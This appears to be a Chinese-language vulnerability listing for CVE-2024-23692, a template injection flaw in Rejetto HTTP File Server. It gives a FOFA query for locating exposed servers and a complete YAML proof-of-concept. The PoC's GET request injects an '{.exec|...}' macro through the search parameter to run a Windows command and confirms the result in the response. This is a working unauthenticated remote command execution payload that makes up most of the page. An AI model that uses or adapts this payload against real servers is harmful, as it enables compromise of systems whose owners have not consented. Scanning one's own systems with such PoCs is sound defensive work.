CVE-2024-23692: HTTP File Server Template_injection

日期: 2025-09-01 | 影响软件: HTTP File Server | POC: 已公开

漏洞描述

fofa: "HttpFileServer" Rejetto HTTP文件服务器,直到并包括2.3m版本,都存在模板注入漏洞。此漏洞允许远程、未经认证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令

PoC代码[已公开]

id: CVE-2024-23692
info: 
  name: HTTP File Server Template_injection
  author: laohuan12138
  severity: critical
  verified: true
  description: |
    fofa: "HttpFileServer"
    Rejetto HTTP文件服务器,直到并包括2.3m版本,都存在模板注入漏洞。此漏洞允许远程、未经认证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令

  references:
    - https://mp.weixin.qq.com/s/xVQ23j3orVYgdEM1ywpcZg
  tags: rce,cve,cve2024
  created: 2024/06/14

set:
  num1: randomInt(1000,9999)
  num2: randomInt(1000,9999)

rules:
  r0:
    request:
      method: GET
      path: /?n=%0A&cmd=cmd+/c+set+/A+{{num1}}*{{num2}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
    expression: response.status == 200 && response.body.bcontains(b"RESULT") && response.body.bcontains(bytes(string(num1 * num2)))


expression: r0()

相关漏洞推荐